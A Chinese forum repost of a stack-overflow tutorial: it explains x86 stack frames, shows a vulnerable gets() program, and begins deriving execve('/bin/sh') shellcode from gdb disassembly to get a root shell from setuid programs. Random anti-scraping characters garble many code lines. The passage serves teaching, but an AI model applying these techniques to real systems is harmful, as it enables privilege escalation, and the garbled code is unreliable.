EDA365欢迎您登录!
您需要 登录 才可以下载或查看,没有帐号?注册
x
堆栈溢出技术从入门到精通. A/ H' ] x8 f
2 |0 ^+ e3 K: d, f虽然溢出在程序开发过程中不可完全避免,但溢出对系统的威胁是巨大的,由于系统的特殊性,溢出发生时攻击者可以利用其漏洞来获取系统的高级权限root,因此本文将详细介绍堆栈溢出技术…… 在您开始了解堆栈溢出前,首先你应该了解win32汇编语言,熟悉寄存器的组成和功能。你必须有堆栈和存储分配方面的基础知识,有关这方面的计算机书籍很多,我将只是简单阐述原理,着重在应用。其次,你应该了解linux,本讲中我们的例子将在linux上开发。 1、首先复习一下基础知识。 从物理上讲,堆栈是就是一段连续分配的内存空间。在一个程序中,会声明各种变量。静态全局变量是位于数据段并且在程序开始运行的时候被加载。而程序的动态的局部变量则分配在堆栈里面。 从操作上来讲,堆栈是一个先入后出的队列。他的生长方向与内存的生长方向正好相反。我们规定内存的生长方向为向上,则栈的生长方向为向下。压栈的操作push=ESP-4,出栈的操作是pop=ESP+4.换句话说,堆栈中老的值,其内存地址,反而比新的值要大。请牢牢记住这一点,因为这是堆栈溢出的基本理论依据。 在一次函数调用中,堆栈中将被依次压入:参数,返回地址,EBP。如果函数有局部变量,接下来,就在堆栈中开辟相应的空间以构造变量。函数执行结束,这些局部变量的内容将被丢失。但是不被清除。在函数返回的时候,弹出EBP,恢复堆栈到函数调用的地址,弹出返回地址到EIP以继续执行程序。 在C语言程序中,参数的压栈顺序是反向的。比如func(a,b,c)。在参数入栈的时候,是:先压c,再压b,最后a。在取参数的时候,由于栈的先入后出,先取栈顶的a,再取b,最后取c。这些是汇编语言的基础知识,用户在开始前必须要了解这些知识。 2、现在我们来看一看什么是堆栈溢出。 运行时的堆栈分配 堆栈溢出就是不顾堆栈中数据块大小,向该数据块写入了过多的数据,导致数据越界,结果覆盖了老的堆栈数据。 例如程序一: #include
# M, w5 F# f8 _ t7 W3 rint main ( )
5 z- t$ ?4 Z# B' Z4 {{
: g: l/ i+ W! F3 A( s' U6 K/ F: jchar name[8]; - s9 u6 L! O- d# J3 N
printf("Please type your name: ");
% G- F/ U& |9 ^+ mgets(name); 5 F! f2 |% P+ d) v# w
printf("Hello, %s!", name); * M$ U, H" k+ D1 E
return 0; * |. W0 Q7 j8 C2 q! X. g. l
} |
编译并且执行,我们输入ipxodi,就会输出Hello,ipxodi!。程序运行中,堆栈是怎么操作的呢? 在main函数开始运行的时候,堆栈里面将被依次放入返回地址,EBP。 我们用gcc -S 来获得汇编语言输出,可以看到main函数的开头部分对应如下语句: pushl %ebp
1 A5 t2 n' x4 H9 e( [, jmovl %esp,%ebp - y, |8 W. w% y0 x( J- i
subl $8,%esp |
首先他把EBP保存下来,,然后EBP等于现在的ESP,这样EBP就可以用来访问本函数的局部变量。之后ESP减8,就是堆栈向上增长8个字节,用来存放name[]数组。最后,main返回,弹出ret里的地址,赋值给EIP,CPU继续执行EIP所指向的指令。 堆栈溢出 现在我们再执行一次,输入ipxodiAAAAAAAAAAAAAAA,执行完gets(name)之后,由于我们输入的name字符串太长,name数组容纳不下,只好向内存顶部继续写‘A’。由于堆栈的生长方向与内存的生长方向相反,这些‘A’覆盖了堆栈的老的元素。 我们可以发现,EBP,ret都已经被‘A’覆盖了。在main返回的时候,就会把‘AAAA’的ASCII码:0x41414141作为返回地址,CPU会试图执行0x41414141处的指令,结果出现错误。这就是一次堆栈溢出。 3、如何利用堆栈溢出 我们已经制造了一次堆栈溢出。其原理可以概括为:由于字符串处理函数(gets,strcpy等等)没有对数组越界加以监视和限制,我们利用字符数组写越界,覆盖堆栈中的老元素的值,就可以修改返回地址。 在上面的例子中,这导致CPU去访问一个不存在的指令,结果出错。事实上,当堆栈溢出的时候,我们已经完全的控制了这个程序下一步的动作。如果我们用一个实际存在指令地址来覆盖这个返回地址,CPU就会转而执行我们的指令。 在UINX/linux系统中,我们的指令可以执行一个shell,这个shell将获得和被我们堆栈溢出的程序相同的权限。如果这个程序是setuid的,那么我们就可以获得root shell。下一讲将叙述如何书写一个shell code。 如何书写一个shell code 一:shellcode基本算法分析 在程序中,执行一个shell的程序是这样写的: shellcode.c
- j& Q7 [) S5 F- x: f------------------------------------------------------------------------
' i- i( W6 b# ^1 k# ?; q: D: ?; J6 _#include : y; i8 K I8 B' t/ V
void main() {
; X- ?/ d/ b3 c1 B' schar *name[2];
' [* v: @( I: T" dname[0] = "/bin/sh"
* V" S" q$ C) o. }) @2 sname[1] = NULL; 9 W) \3 [0 O, } S# A# j/ w) i
execve(name[0], name, NULL);
, W% l8 k; F7 @6 B- r% ~}
, w8 y# e/ l* w- k) N------------------------------------------------------------------------ |
execve函数将执行一个程序。他需要程序的名字地址作为第一个参数。一个内容为该程序的argv(argv[n-1]=0)的指针数组作为第二个参数,以及(char*) 0作为第三个参数。 我们来看以看execve的汇编代码: [nkl10]$Content$nbsp;gcc -o shellcode -static shellcode.c & Q2 J! b- F# b
[nkl10]$Content$nbsp;gdb shellcode 9 C6 ^) O* c, s7 f ~. q; ~
(gdb) disassemble __execve 4 G. u& ] f3 [. p g
Dump of assembler code for function __execve: & w" }/ G L. O, `' v) c8 c
0x80002bc <__execve>: pushl %ebp ; ' ^$ l3 m& l1 j! [ w
0x80002bd <__execve+1>: movl %esp,%ebp
6 E/ ]( e) K, Q5 ~5 J;上面是函数头。 1 ~2 V- |' a6 n- o, C. Z2 ?2 y
0x80002bf <__execve+3>: pushl %ebx 8 @ T7 H/ y& i7 Y/ x+ r, R+ I
;保存ebx
2 m5 b: O$ ^' Q9 A0x80002c0 <__execve+4>: movl $0xb,%eax 2 d5 B9 o8 K2 p
;eax=0xb,eax指明第几号系统调用。 - S2 L5 v& W. K" W9 Q# Q* x- x
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
3 n8 v0 k1 Y3 Y6 w: C8 U1 r8 j& e;ebp+8是第一个参数"/bin/sh\0"
3 {* T& } d# H1 l2 R2 M' F/ a/ m3 c& v0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx + s4 E4 `+ `2 u0 I
;ebp+12是第二个参数name数组的地址 / {' Z0 Y8 |' s7 m/ v
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
7 I8 }5 f; E) c8 v;ebp+16是第三个参数空指针的地址。 ! Y4 h! r, F4 d+ k
;name[2-1]内容为NULL,用来存放返回值。 . p0 G1 C9 D `! \0 l1 A
0x80002ce <__execve+18>: int $0x80
, w+ e4 }$ H# S2 B;执行0xb号系统调用(execve) ; v1 P3 S% o g' S6 L$ x+ g5 p
0x80002d0 <__execve+20>: movl %eax,%edx - K' i- T4 b2 b% h0 }" n
;下面是返回值的处理就没有用了。
. l5 Y3 ?: I. |( W' m9 Q. c0x80002d2 <__execve+22>: testl %edx,%edx $ U3 A1 I# g) i) d3 N9 p
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
6 L( q" y& b# z" I$ k* s0x80002d6 <__execve+26>: negl %edx
/ r5 N( q2 f6 _2 y! I$ y! y0x80002d8 <__execve+28>: pushl %edx
# ]( H1 I; s- }0x80002d9 <__execve+29>: call 0x8001a34 1 i1 [ Y7 u4 L
<__normal_errno_location>
( o; }, L$ a3 l7 c; ~0x80002de <__execve+34>: popl %edx
& O; S8 f7 y0 w1 Z% K' y0x80002df <__execve+35>: movl %edx,(%eax) $ A" J8 Z1 p# L( @2 ?4 H& E; T
0x80002e1 <__execve+37>: movl $0xffffffff,%eax
6 b _% n/ x! |7 `" a8 H( p, w0x80002e6 <__execve+42>: popl %ebx . v {; X) M2 u6 u
0x80002e7 <__execve+43>: movl %ebp,%esp $ g/ s$ C' C! M4 w d# o" A
0x80002e9 <__execve+45>: popl %ebp 3 P, c8 y5 ]: e+ p( ]
0x80002ea <__execve+46>: ret
" o! Y8 R1 O* L7 X) x8 F1 J$ i0x80002eb <__execve+47>: nop
( h2 z2 Q/ x6 E! N( M. D3 A2 lEnd of assembler dump. |
经过以上的分析,可以得到如下的精简指令算法: movl $execve的系统调用号,%eax
& u0 T0 p: n. h9 cmovl "bin/sh\0"的地址,%ebx
! a( t# m: n8 D0 O( Emovl name数组的地址,%ecx
( h' e0 E1 u& @" F' u+ |2 n U$ {movl name[n-1]的地址,%edx - s8 D: A* @ O: ~2 m( e; F
int $0x80 ;执行系统调用(execve) |
当execve执行成功后,程序shellcode就会退出,/bin/sh将作为子进程继续执行。可是,如果我们的execve执行失败,(比如没有/bin/sh这个文件),CPU就会继续执行后续的指令,结果不知道跑到哪里去了。所以必须再执行一个exit()系统调用,结束shellcode.c的执行。 我们来看以看exit(0)的汇编代码: (gdb) disassemble _exit
9 j A4 p! l! c6 [6 s% yDump of assembler code for function _exit: ! k7 T! s3 A) p, h1 S& @5 q$ [* I
0x800034c <_exit>: pushl %ebp 3 o' m3 [1 q0 w, Q/ M x6 _& M) T
0x800034d <_exit+1>: movl %esp,%ebp 4 q3 n: W7 A) V" x
0x800034f <_exit+3>: pushl %ebx ) k0 P9 U: }: `( h# u, C+ A
0x8000350 <_exit+4>: movl $0x1,%eax ;1号系统调用 `. y: U. ?% F; l8 |
0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx ;ebx为参数0 9 ]' j- |3 S* q0 S! F4 E
0x8000358 <_exit+12>: int $0x80 ;引发系统调用
3 u& D# W- ^3 @ w5 k5 [0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx
' P, L3 t2 W+ b8 u3 ~ G* U0x800035d <_exit+17>: movl %ebp,%esp
7 V4 O( w' v. k0x800035f <_exit+19>: popl %ebp
! H( a/ J3 X) t; C5 O2 u0x8000360 <_exit+20>: ret
: L8 T y9 _' ~0x8000361 <_exit+21>: nop 9 z1 ^2 K7 w0 a% d" T
0x8000362 <_exit+22>: nop 4 v+ p8 g3 l, }2 z. k4 b
0x8000363 <_exit+23>: nop 0 m2 ]* |# U6 K; g/ e' o V( {$ P
End of assembler dump. |
看来exit(0)〕的汇编代码更加简单: movl $0x1,%eax ;1号系统调用 8 e7 G) W/ R! {) ~7 L4 a- x! |, }
movl 0,%ebx ;ebx为exit的参数0 : o- _% t$ v; N
int $0x80 ;引发系统调用 |
那么总结一下,合成的汇编代码为: movl $execve的系统调用号,%eax
9 j7 e5 K' \- h1 L4 w# |' Pmovl "bin/sh\0"的地址,%ebx , v( F4 y( j: B! x9 w
movl name数组的地址,%ecx - L" g) b/ J% T5 ~
movl name[n-1]的地址,%edx " u; x. ^! N( M. \: l/ @, u5 @. i0 |
int $0x80 ;执行系统调用(execve)
t0 i. H- h) }8 e3 Omovl $0x1,%eax ;1号系统调用 * o" |7 w$ [' `) _7 Z
movl 0,%ebx ;ebx为exit的参数0
1 O" H2 y0 O/ N1 }- iint $0x80 ;执行系统调用(exit) |
( b* A% q2 G a |